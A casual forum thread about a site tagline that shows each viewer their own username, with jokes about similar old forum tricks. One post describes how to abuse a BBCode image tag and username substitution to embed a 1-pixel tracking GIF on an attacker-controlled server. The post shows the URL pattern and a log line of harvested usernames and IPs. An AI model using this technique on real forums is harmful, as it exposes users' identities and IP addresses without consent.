The power posters convene each week and vote on who the biggest nerd is, sorry.
I've never seen that tag before, since all my posts are perfect.
I thought it was pretty funny, I saw it one other time before. Being the self-centered peer that I am, my thought immediately went to "I hope I'm not the only person who see's this" (I know, its kinda sad of me...)
Ancient forum magic, this is honestly one of the first places I've seen use it since the olden days of Gamefaqs linking to "this user sucks" and it's just a link that always goes to the profile of whoever clicks it
I think some forums turned it off rather than figure out how to secure it lol, when forum users can embed the "replace with username" string in their posts.
Whenever there was a
BB code on some forum, there would almost always also be ][
for embedding images. I still find this exploit in forums to this day occasionally, where you can embed a link to a 1 px GIF in your post, with the url like this: ]https://server-i-control.tld/image.gif?u=[username]
and then my web server log starts filling up with username + IP combos of people viewing the thread like:2069-01-01 00:00:00 - 443 - - /image.gif?u=chickentendrils
I think :reddit-logo: had a u/me page that would redirect to you way back when, but yeah untapped potential.
If you think that's bad, you should see the shit this website says about you behind your back.
No wonder I'm failing so many background checks since I started here.
My favorite one is along the lines of 'I know a good joke, what if we did Communism but didn't invite /username/?'
As far as site taglines go
is my favorite
That one always makes me have the same reaction: anticipatory smile, retreat to a frown, then chuckle at myself for frowning.
the tagline is a trap, we only know to make fun of you if you make this exact post
yea totally, I got the same vibe, but then I was thinking, it would be kinda funny to have that tag for everyone to see... Kinda like something out of Community or Parks & Recreation.
Ladies and gentlemen, we got him